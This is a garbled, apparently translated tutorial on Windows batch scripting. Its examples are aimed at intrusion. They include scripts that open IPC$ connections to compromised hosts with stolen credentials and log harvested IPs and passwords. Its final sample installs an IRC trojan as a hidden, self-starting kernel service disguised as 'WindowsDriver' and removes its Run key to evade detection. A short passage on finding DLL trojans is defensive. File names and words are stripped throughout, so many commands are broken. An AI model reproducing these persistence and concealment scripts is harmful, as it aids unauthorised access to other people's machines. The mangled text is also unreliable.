2. How to use parameters in batch files
Parameters can be used in batch processing, generally from 1% to 9%. When there are multiple parameters, you need to use shift to move. This is rare, so we don’t consider it.
sample1:
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
This example is used to format several floppy disks continuously, so when using it, you need to enter a in the dos window. Haha, it seems to be a bit extra~^_^
sample2:
When we want to establish an IPC$ connection, we always have to enter a large number of commands. If we don’t do it well, we will type incorrectly. So we might as well write some fixed commands into a batch and assign the broiler ip password username to this batch in the same way as the parameters, so we don’t need to type commands every time.
@echo off
@net use //1%/ipc$ "2%" /u:"3%" Note, here PASSWORD is the second parameter.
@if errorlevel 1 echo connection failed
How about it, it is relatively simple to use the parameters? You are so handsome, you must have learned it ^_^.No.3
3. How to use Compound Command
1.&
Usage: First Command & Second Command [& Third Command...]
This method can execute multiple commands at the same time, regardless of whether the command is successfully executed.
Sample:
C:/>dir z: & dir c:/Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:/Ex4rch
2002-05-14 23:51 <DIR> .
2002-05-14 23:51 <DIR> ..
2002-05-14 23:51 14
2.&&
Usage: First Command && Second Command [&& Third Command...]
This method can execute multiple commands at the same time. When an error occurs, the subsequent command will not be executed. If there is no error, all commands will be executed;
Sample:
C:/>dir z: && dir c:/Ex4rch
The system cannot find the path specified.
C:/>dir c:/Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:/Ex4rch
2002-05-14 23:55 <DIR> .
2002-05-14 23:55 <DIR> ..
2002-05-14 23:55 14
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
This kind of command may be used when making backups, such as:
dir file://192.168.0.1/database/ && copy file://192.168.0.1/database/ E:/backup
If a file exists on the remote server, execute the copy command. If the file does not exist, do not execute the copy command. This usage can replace IF exist :)
3.||
Usage: First Command || Second Command [|| Third Command...]
This method can execute multiple commands at the same time. When you encounter the correct command, the subsequent command will not be executed. If no correct command appears, all commands will be executed all the time;
Sample:
C:/Ex4rch>dir || del
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:/Ex4rch
2002-05-14 23:55 14
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
Examples of using combination commands:
sample:
@copy //%1/admin$/system32 && if not Errorlevel 1 echo IP %1 USER %2 PASS %3 >> IV. Use of pipeline commands
1.| Order
Usage: First Command | Second Command [| Third Command...]
Use the result of the first command as a parameter of the second command. Remember that this method is very common in Unix.
sample:
time /t>>D:/
netstat -n -p tcp|find ":3389">>D:/
start Explorer
Did you see it? The terminal service allows us to customize the starting program for the user to enable the user to run the following bat to obtain the IP of the logged-in user.
2.>,>>Output redirect command
Redirecting the output results of a command or a program to a specific file. The difference between > and >> is that > will clear the content in the original file and write it to the specified file, while >> will only append the content to the specified file without changing the content.
sample1:
echo hello world>c:/ (stupid example?)
sample2:
DLL *s are popular nowadays. We know that system32 is a good place to play hide-and-seek. Many *s have sharpened their heads and drilled there. DLL horses are no exception. For this point, we can record the EXE and DLL files in this directory after installing the system and necessary applications:
Run CMD--Convert directory to system32--dir *.exe> & dir *.dll>,
In this way, the names of all EXE and DLL files are recorded in the same,
If you find an exception in the future but cannot find the problem with traditional methods, you should consider whether the DLL * has been sneaked into the system.
At this time, we use the same command to record the EXE and DLL files under system32 to another sum, and then run:
CMD--fc > & fc >.(Use the FC command to compare the DLL and EXE files before and after, and enter the results into it), so that we can find some extra DLL and EXE files, and then by checking the creation time, version, whether it has been compressed, etc., it can be easier to determine whether it has been patronized by the DLL *. It is best not to have no. If there is any, don't just DEL. First use regsvr32/u to log out the backdoor DLL file, and then move it to the recycling bin. If the system does not have any abnormal response, delete it completely or submit it to the antivirus software company.
3.< 、>& 、<&
< Read command input from a file instead of from the keyboard.
>& Writes the output of one handle to the input of another handle.
<& Read input from one handle and write it to the output of another handle.
These are not commonly used, so I won't introduce them much.
No.5
5. How to use batch files to operate the registry
During the intrusion process, the specific key values in the registry are often returned to achieve certain purposes, such as: to hide the backdoor and * program, delete the remaining key values under Run. Or create a service to load the backdoor. Of course, we will also modify the registry to strengthen the system or change a certain attribute of the system. These require us to have a certain understanding of registry operations. Let’s first learn how to use .REG files to operate the registry. (We can use batch processing to generate a REG file)
Regarding the operations of the registry, common things are creation, modification, and deletion.
1. Create
Creation is divided into two types, one is to create subkey (Subkey)
We create a file with the following content:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/hacker]
Then execute the script and you have created a child named "hacker" under HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft.
Another way is to create a project name
Then this file format is a typical file format, which is consistent with the file format you exported from the registry. The content is as follows:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"Door"=C://WINNT//system32//
"Autodos"=dword:02
This is under [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
Created: Invader, door, and about three projects
The type of Invader is "String Value"
The type of door is "REG SZ Value"
The type of Autodos is "DWORD Value"
2. Modify
Modification is relatively simple. Just export the project you need to modify, then modify it with Notepad, and then import (regedit/s).
3. Delete
Let’s first talk about deleting a project name. We create a file like this:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Ex4rch"=-
Execute this script, "Ex4rch" under [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run] will be deleted;
Let's take a look at deleting a child, and we create a script like this:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
After executing the script, [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run] has been deleted.
I believe that after seeing this, you have basically mastered the .reg file. So the current goal is to use batch processing to create .reg files for specific content. Remember what we mentioned earlier, using redirect symbols can easily create specific types of files.
samlpe1: As in the example above, if you want to generate the following registry file
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
Just need to do this:
@echo Windows Registry Editor Version 5.00>>
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]>
@echo "Invader"="Ex4rch">>
@echo "door"=5>>C://WINNT//system32//>>
@echo "Autodos"=dword:02>>
samlpe2:
When we are using some older *s, we may generate a key value under [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run(Runonce, Runservices, Runexec)] in the registry to realize the self-start of the *. However, this can easily expose the path of the * program, resulting in the * being detected. Relatively, if the * program is registered as a system service, it is relatively safe. The following is a good IRC * DSNX as an example (named)
@start
@attrib +h +r
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run] >>
@echo "windsnx "=- >>
@ create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:/winnt/system32/
@regedit /s
@delete
@REM [Delete the startup item of DSNXDE in the registry, and set its properties to hidden and read-only while registering it as a system-critical service, and config as self-start]
@REM This is not safer^_^.
Previous page12Read the full text